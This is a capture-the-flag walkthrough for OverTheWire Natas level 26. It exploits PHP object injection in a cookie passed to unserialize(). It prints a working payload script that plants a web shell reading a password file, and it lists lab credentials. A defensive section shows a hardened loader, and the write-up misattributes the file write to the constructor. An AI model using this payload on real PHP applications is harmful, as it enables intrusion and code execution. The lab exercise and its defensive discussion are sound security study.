Natas · OverTheWire

Natas Level 26 → Level 27

Level 26

Username : natas26
Password : oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
URL : http://natas26.natas.labs.overthewire.org

Solution

To solve this level, we first log into the natas26 application using the credentials provided above.

[Screenshot]

As we can see, the application has four input fields for numbers to create a line graph. Let’s put some random input and see how the application responds.

[Screenshot]

As we can see, the application creates a line graph and displays it as an image. Let’s check the source code now.

[Screenshot]

The application utilizes the following functions:

showImage($filename)
drawImage($filename)
drawFromUserdata($img)
storeData()

Apart from these functions, the application also defines a Logger class with the methods __construct($file), log($msg), and __destruct(). The application flow appears to be as follows:

If the cookie "drawing" exists: drawImage($filename) -> drawFromUserdata($img) -> showImage($imgfile) -> storeData()

The class "Logger" is not used anywhere in the application. On scrolling through the code looking for functions that interact with user data, the function unserialize() caught my eye. Since I did not have prior knowledge of working with the function, I came across this article while searching for it. The article describes two conditions that must be met for a "PHP Object Injection" attack to work:

  • The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be used to carry out malicious attacks, or to start a “POP chain”.
  • All of the classes used during the attack must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for such classes.

Both of these conditions are satisfied by our application. Let’s use the examples mentioned in the link to learn more about how to exploit this vulnerability.

<?php
class Logger
{
    private $logFile;
    private $initMsg;
    private $exitMsg;
    function __construct($file)
    {
        // initialise variables
        $this->initMsg="Hello\n";
        $this->exitMsg="Goodbye <? passthru('cat /etc/natas_webpass/natas27'); ?>\n\n";
        $this->logFile = "img/shell.php";
    }
}
$object = new Logger("Security Times");
echo "Serialized Object : ".serialize($object)."<pre>\n\n</pre>Base64 encoded serialized object : ".urlencode(base64_encode(serialize($object)));
?>

The above code creates an object of class "Logger". Creating the object calls the __construct() function, which executes our command and stores the result in the img/shell.php file.

The output of the above code is the cookie value that needs to be sent. Let’s replace the cookie value and see what happens.

[Screenshot]

As we can see above, the application responds with a warning message. Let’s now check the contents of img/shell.php file.

[Screenshot]

As we can see, the application responds with the password for the next level.
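For the defensive side of this level, here is an added example (not the level's own code and not from the write-up's author) showing the pattern that makes the cookie dangerous next to a hardened loader. It assumes a Logger-like class whose __destruct() writes to a file, a cookie named "drawing" holding a base64-encoded serialized array, and line points stored as arrays with keys x1, y1, x2, y2; all three are assumptions about the application.

```php
<?php
// Added example: vulnerable unserialize() of a cookie beside a hardened version.
// Assumed gadget: a class whose destructor writes attacker-influenced data to an
// attacker-influenced path (the shape the write-up describes for Logger).
class Logger
{
    private $logFile;
    private $exitMsg = "";

    function __construct($file)
    {
        $this->logFile = $file;
    }

    // Any object of this class built by unserialize() runs this when it is freed.
    function __destruct()
    {
        file_put_contents($this->logFile, $this->exitMsg, FILE_APPEND);
    }
}

// VULNERABLE: every class declared in the script may be instantiated from the
// cookie, so a crafted Logger object is created server-side and its
// __destruct() fires even though the application never uses Logger itself.
function loadDrawingUnsafe($cookie)
{
    return unserialize(base64_decode($cookie));
}

// HARDENED: allowed_classes => false (PHP >= 7.0) turns every serialized object
// into __PHP_Incomplete_Class, for which no magic methods run. The result is then
// validated against the only shape the application expects: a list of points
// with four integer coordinates. Anything else is dropped.
function loadDrawingSafe($cookie)
{
    $data = @unserialize(base64_decode($cookie), ['allowed_classes' => false]);
    if (!is_array($data)) {
        return [];
    }
    $points = [];
    foreach ($data as $p) {
        if (is_array($p) && isset($p['x1'], $p['y1'], $p['x2'], $p['y2'])
            && is_int($p['x1']) && is_int($p['y1'])
            && is_int($p['x2']) && is_int($p['y2'])) {
            $points[] = ['x1' => $p['x1'], 'y1' => $p['y1'],
                         'x2' => $p['x2'], 'y2' => $p['y2']];
        }
    }
    return $points;
}
```

Storing the drawing as JSON (json_encode/json_decode) instead of a PHP serialization string removes the class-instantiation problem entirely, since json_decode never creates objects of application classes.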


Level 27

Username : natas27
Password : 55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ
URL : http://natas27.natas.labs.overthewire.org
